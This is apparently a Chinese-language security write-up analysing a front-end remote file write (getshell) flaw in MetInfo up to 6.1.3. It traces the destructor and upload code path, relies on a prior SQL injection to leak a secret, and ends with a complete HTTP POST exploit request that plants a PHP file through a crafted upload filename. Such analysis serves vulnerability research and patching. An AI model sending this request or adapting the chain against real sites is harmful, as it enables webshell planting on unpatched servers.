某info <= 6.1.3前台getshell

本漏洞需要结合前台 SQL 注入进行getshell。

漏洞分析

漏洞文件存在于 app/system/include/class/web.class.php 文件中，我们可以看到当满足条件： $_M['form']['metinfonow'] == $_M['config']['met_member_force'] 时， web 类的析构函数会将缓冲区的数据写入一个可控的文件中，其代码具体如下：

为了满足上面的条件，我们需要先看看 $_M['config']['met_member_force'] 是什么。通过搜索 met_member_force 关键字，我们可以发现其值的生成方式是通过 randStr 函数随机生成 7个 字符。具体代码如下：

针对 Metinfo6.x <= 6.1.2 的版本，我们可以利用已知的 SQL注入 漏洞（留言版处）获取 $_M['config']['met_member_force'] 的值，而 Metinfo6.1.3 的版本，也可以利用未修复的 SQL注入 漏洞（反馈处），具体漏洞细节可参考： Metinfo6.0.0-6.1.2前台注入漏洞生命线 。下图为通过注入获取 $_M['config']['met_member_force'] 的值：

接下来就是寻找 web 类的子类，因为他们都继承了父类的 __destruct 方法，我们只要找到可控制的缓冲区数据，便可完成整个攻击。通过全局搜索 extends web 关键字，我们发现有一个 uploadify 子类非常适合。该上传类不管上传操作成功与否，都会将相关信息输出（即可将数据送入缓冲区）。该类中有多个方法均可利用，我们随机选取一个 doupfile 方法来分析。

我们可以看到下图代码 第17行 直接将 $back 变量输出，我们跟进到 第15行 ，观察该变量值的来源。

从上图代码中，我们可以清晰的看到 $back 变量来源于可控的 $_M['form']['formname'] ，我们跟进对其处理的 upfile 类的 upload 方法，具体代码如下：

我们看到 第30行 代码，如果 $this->ext 类型不再数据库中，就将其返回，而如果我们将文件名设置为 <?php phpinfo();?> ，这样这段代码也会被输出到缓冲区中。接着回到我们文章开头的代码中，便可成功写入 shell 。

攻击

POST /metinfo/admin/index.php?c=uploadify&m=include&a=doupfile⟨=cn&metinfonow=qipwtxm&html_filename=1.php HTTP/1.1
Host: localhost
Content-Length: 196
Origin: http://localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8tQiXReYsQYXHadW
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: XDEBUG_SESSION=PHPSTORM
Connection: close

------WebKitFormBoundary8tQiXReYsQYXHadW
Content-Disposition: form-data; name="test"; filename="<?php phpinfo();?>"
Content-Type: image/jpeg

test
------WebKitFormBoundary8tQiXReYsQYXHadW--

攻击流程图

最后我们再来理一下整个攻击的流程：

参考

【技术分析】Metinfo利用sql注入快速getshell